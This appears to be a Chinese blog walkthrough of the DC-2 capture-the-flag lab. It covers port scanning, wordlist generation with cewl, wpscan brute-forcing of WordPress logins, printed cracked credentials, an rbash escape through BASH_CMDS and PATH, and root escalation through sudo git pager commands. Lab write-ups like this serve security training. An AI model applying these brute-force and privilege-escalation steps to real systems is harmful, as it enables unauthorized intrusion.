靶机-DC2

已于 2023-11-27 19:58:55 修改
阅读量962 收藏 26
点赞数 14
分类专栏: 靶机 文章标签: 网络 安全
于 2023-11-27 19:57:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44796547/article/details/134653091
版权
文章讲述了在网络安全背景下,如何使用Nmap探测网络端口,通过host文件解决域名解析问题,利用CEWL工具爬取网站内容生成字典进行密码破解,以及使用WPScan对WordPress网站进行漏洞扫描和暴力破解。还介绍了如何通过SSH和Git进行提权的方法。
摘要由CSDN通过智能技术生成

查找同网段ip

在这里插入图片描述

nmap查端口

在这里插入图片描述

host文件地址:C:\Windows\System32\drivers\etc

发现无法正常访问页面,但在url地址栏会有http://dc-2域名提示,发现问题是本地无法解析域名dc-2

这时候就意识到对方可能做了重定向,在本机的host文件中加入ip地址和域名:

192.168.253.157 dc-2

成功访问

在这里插入图片描述

找到flag1

在这里插入图片描述

翻译一下

你通常的单词表可能不起作用,所以,也许你只需要保持冷静。

密码越多越好,但有时你无法赢得所有密码。

以一个身份登录以查看下一个标志。

如果找不到,请以其他身份登录。

cewl是kali自带的脚本工具

cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个字典,这个字典可以传给其他工具进行密码暴力破解。(简单理解就是利用爬取到的网站的内容去生成字典)

-m:用于指定最终生成字典中字符最小长度,只有超过指定长度才会记录到字典中

-d:爬取地址/网站的深度,一般默认是2

-e:收集包含email地址信息

-c:统计每个字符串出现的次数

-v:显示爬取过程中的详细信息

-w:将爬取到的字符串写入到指定文档

--debug:开启调试模式,这样就可以查看网站爬取过程中出现的错误和元数据了

--with-numbers:生成包含数字和字符的字典文件

--auth_type ,--auth_user, --auth_pass:目标网站需要进行页面登录认证的话,使用该参数来绕过页面认证的限制

--proxy_port:目标网站设置了代理服务器的话,–proxy option选项来启用代理URL功能,默认端口是8080

–proxy_host:代理主机地址

–proxy_username:代理的账户名

–proxy_password:代理的密码

wappalyzer查看网站信息

在这里插入图片描述

根据网站利用cewl生成密码并写入文档:

cewl -w dc-passwd.txt http://dc-2

在这里插入图片描述

网站的CMS为WordPress,那我们就可以使用wpscan对网站进行扫描:

wpscan是一款专门针对wordpress的扫描工具,采用ruby语言编写,能够扫描worpress网站中包括主题漏洞、插件漏洞以及wordpress网站本身存在的漏洞。wpscan还可以扫描wordpress网站启用的插件和其他功能。

wpscan --url "【目标系统URL】"

wpscan --url "【目标系统URL】" --enumerate t
可以着重性的扫描目标系统的主题

wpscan --url "【目标系统URL】" --enumerate vt
可以着重对wordpress系统的主题方面的漏洞进行扫描

wpscan --url "【目标系统URL】" --enumerate p
可以着重对WordPress的插件进行扫描

wpscan --url "【目标系统URL】" --enumerate vp
可以着重对WordPress的插件漏洞进行扫描

wpscan --url "【目标系统URL】" --enumerate u
可以对WordPress的用户进行枚举

wpscan --url "【目标系统URL】"  --wordlist 【密码字典文件】 --username 【用户名】
即可进行wordpress用户名和密码的暴力破解

上述命令参数如果不存在,可以尝试执行命令:

wpscan --url "http://124.70.71.251:45419/" -P "【密码文件路径】" --usernames admin

TimThumbs是wordpress的常用文件,主要和缩略图的使用有关,wpscan有针对TimThumbs文件的扫描命令。执行命令:
wpscan --url "【目标系统URL】" --enumerate tt

在这里插入图片描述

爆破之后得到两组用户名和密码

wpscan --url http://dc-2/ -U user.txt -P dc-passwd.txt

jerry:adipiscing

tom:parturient

在这里插入图片描述

dirb http://dc-2

在这里插入图片描述

nikto扫一下

在这里插入图片描述

访问网站登录页面

http://dc-2/wp-login.php

发现flag2

在这里插入图片描述

翻译

如果你不能利用WordPress并采取快捷方式,还有另一种方法。

希望你找到了另一个切入点。

提示不能利用WordPress了

由于7744端口开着,使用ssh

找到flag3

在这里插入图片描述

发现cat不执行

vi查看

在这里插入图片描述

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的所有压力道歉。

提示jerry和su

绕过也许

在这里插入图片描述

BASH_CMDS[a]=/bin/sh;a       #注:把 /bin/sh 给a变量并调用
export PATH=$PATH:/bin/      #注:将 /bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin   #注:将 /usr/bin 作为PATH环境变量导出

还要用绕过

在这里插入图片描述

登录成功后切换到jerry的家目录,发现flag4

在这里插入图片描述

很高兴看到你已经走了这么远,但你还没有回家。

你仍然需要得到最终的标志(唯一真正重要的标志!!)。

这里没有提示-你现在只能靠自己了。:-)

快离开这里!!!!

提示中有git

查看可以使用root权限的命令,发现git可以使用,通过git提权

sudo -l

在这里插入图片描述

提权:

1、sudo git help config #在末行命令模式输入 
!/bin/bash 或 !'sh' #完成提权 
2、sudo git -p help 
!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

这两种方式的前提是把shell窗口变小,使得不能在一页全部显示,才可以输入。

如果不能输入,说明你的shell窗口不够小。

在这里插入图片描述

找到最后flag

在这里插入图片描述

  • 修改 hosts 文件来访问网站。
  • 使用 cewl 制作字典。
  • 使用 wpscan 对 WordPress 站点进行扫描和爆破。
  • rbash 绕过
  • sudo 提权
  • git 提权

ser-images\image-20211108173501687.png)

如果不能输入,说明你的shell窗口不够小。

找到最后flag
在这里插入图片描述

  • 修改 hosts 文件来访问网站。
  • 使用 cewl 制作字典。
  • 使用 wpscan 对 WordPress 站点进行扫描和爆破。
  • rbash 绕过
  • sudo 提权
  • git 提权
随风随梦自在逍遥
关注
专栏目录
DC2靶机练习
LSYZWF的博客
04-22 304
实验环境:DC-2靶机,kali linux攻击机,win10辅助机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、kali主机扫描内网存活主机 查询kali主机的ip地址:192.168.246.130 创建DC2专用文件夹 开始扫描 继续具体扫描目标主机 开放的端口 目标系统开放了80端口与7744端口 开放了80端口,用浏览器访问ip地址,发现网页打不开,但是网址重定向为http://dc-2 所以需要在物
DC2-靶机
Au
08-19 1752
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
DC-2靶机
m0_62094846的博客
01-29 3457
前面做法和DC-1差不多,信息收集 ifconfig nmap 192.168.61.0/24 输入IP后会跳转域名,但是无法访问页面 发现问题是本地无法解析域名dc-2(看的别人的解释) 要配置可以解析的文件 在命令行中输入 vim /etc/hosts (修改配置文件需要root权限) 要在虚拟机中输入IP才可以,因为文件是在虚拟机配置的 flag1: 提示爆破字典只需要cewl产生的字典即可,并且可能可以爆破出两个不同的账号,可能一个无效 ...
DC-2靶机渗透测试过程(个人学习)
最新发布
m0_59028058的博客
07-12 1210
使用tom目录查看当前文件夹下的文件可以发先flag3.txt文件,使用 cat 命令显示存在 rbash 限制,这里可以用 vi 来查看flag3.txt文件中的内容。在探测端口和服务的时候可以发现靶机开放了一个ssh端口,只不过不是默认的22端口,是7744端口,尝试利用jerry和tom账户ssh连接。扫描出来可以就可以发现80端口存在一个无法重定向的问题,我们访问网页无法重定向到dc-2这个域名中,则需要修改一下hosts文件。在flag3的提示中,提示了“su”,可能需要用到sudo提权。
靶机 DC-2
m0_66299232的博客
09-13 1041
rbash是什么?rbash与一般shell的区别在于会限制一些行为,让一些命令无法执行。1>如何设置一个rbashcp /bin/bash /bin/rbash # 复制一个bash,重命名为rbashmkdir -p /home/test/.bin # 在test用户下新建一个.bin目录存放可以执行的命令2>rbash提权export -p //查看环境变量a //把/bin/sh给a/bin/bash。
靶机DC-2 WP
m0_66638011的博客
05-13 685
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-2靶场攻破过程:1、我们先进行信息收集,发现了http协议和ssh协议,更改DNS后进入网页,发现了flag1。
DC-2靶机渗透
weixin_45349299的博客
01-02 713
title: DC-2靶机渗透详解 date: 2022-1-1 23 :38 :36 tags: DC系列靶机 categories: 学习笔记kali攻击机:192.168.1.103靶机:192.168.2.102,以10000的速率扫描靶机的所有端口,对指定端口的服务做综合详细扫描打不开192.168.2.108:80的原因:没有在本地设置hosts本地hosts文件位置:C:\Windows\System32\drivers\etc添加192.168.2.102 dc-2然后用更新dns缓存查询D
DC-2 靶机
weixin_63492470的博客
03-11 5470
DC-2靶机下载地址: DC-2 | Five86 | DC Challenges 环境:DC-2靶机地址:192.168.1.139 nmap -sP 192.168.1.0/24 查看ip nmap -A 192.168.1.139 #这里我的靶机IP是132 dirb 192.168.1.139 爆破目录 这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、 然后访问192.168.1.139发现是这个界面,什么也没有看到..
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 616
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
靶机实操:vulnhub-DC2
不想当脚本小子的脚本小子
12-01 269
最近练手的就用vulnhub上面的靶机来玩一玩,一来可以锻炼自己的能力,二来可以举一反三,培养自己的思路,在这里我奉劝各位初学者,一定要动手实操,只有在做的过程中才能够记住你所学的东西。话不多说,今天先来DC2.我这里主要是分享我的一些实验过程以及自己的思路与总结。 首先境安装好以后先哐哐哐各来一通: 开放了80,7744端口,对这个7744端口还挺有兴趣,一会看看有没有什么能够自己操作的地方 wapplyzer是一款火狐插件,亲测好用,发现了wordpress,这个时候就想着一会...
玩转靶机Vulnhub:DC2(详细)
weixin_51566481的博客
07-26 1140
dc2,suid提权,rbash逃逸
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
vulnhub靶机DC-2渗透笔记
liver100day的博客
06-04 664
DC-2 靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:DC-1 IP地址未知 下载地址:http://www.five86.com/downloads/DC-2.zip 渗透过程 1 信息收集 1.1 IP地址确认 命令:arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址 并且
【DC-2靶机
qq_40646572的博客
05-04 1935
信息搜集 通过nmap扫描,发现dc2靶机存在80端口以及7744端口。 通过nmap中的-sV指令发现7744端口是ssh端口。 通过nmap中的script的脚本扫描,发现用户名,先保存下。 打开dc2靶机,发现dns解析错误。配置下hosts文件。 Flag搜集 找到flag1。提示使用cewl爬取单词生成字典。 可能存在Ssh爆破,或者http爆破。 经过目录扫描,发现后台。 通过hydra工具爆破http服务。获取到两个登录用户。 存在两个账号: useraname:
【Vulnhub靶机系列】DC2
zhangge3663的博客
05-05 234
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.168.61.1/24 排查筛选得知,192.168.61.162为DC2的IP地址。 接下来用Nmap对DC2进行端口扫描。 nmap -sC -sV -p- -oA ~/vulnhub/DC2 192.168.61.162 可知DC2开启了80端口和7744端口,根据信息可知7
Vulnhub靶机DC2
qq_48904485的博客
02-13 409
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机DC2(10.0.2.55)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
vulnhub之DC2靶机
LainWith的博客
08-16 1478
靶机概览信息收集nmap信息收集网站信息收集Flag1爬站目录扫描列出站点的用户名、账号渗透攻击爆破后台访问网站Flag2爆破ssh登录ssh绕过rbash拿flag3拿下jerry拿下flag4提权git提权flag5 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机.
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值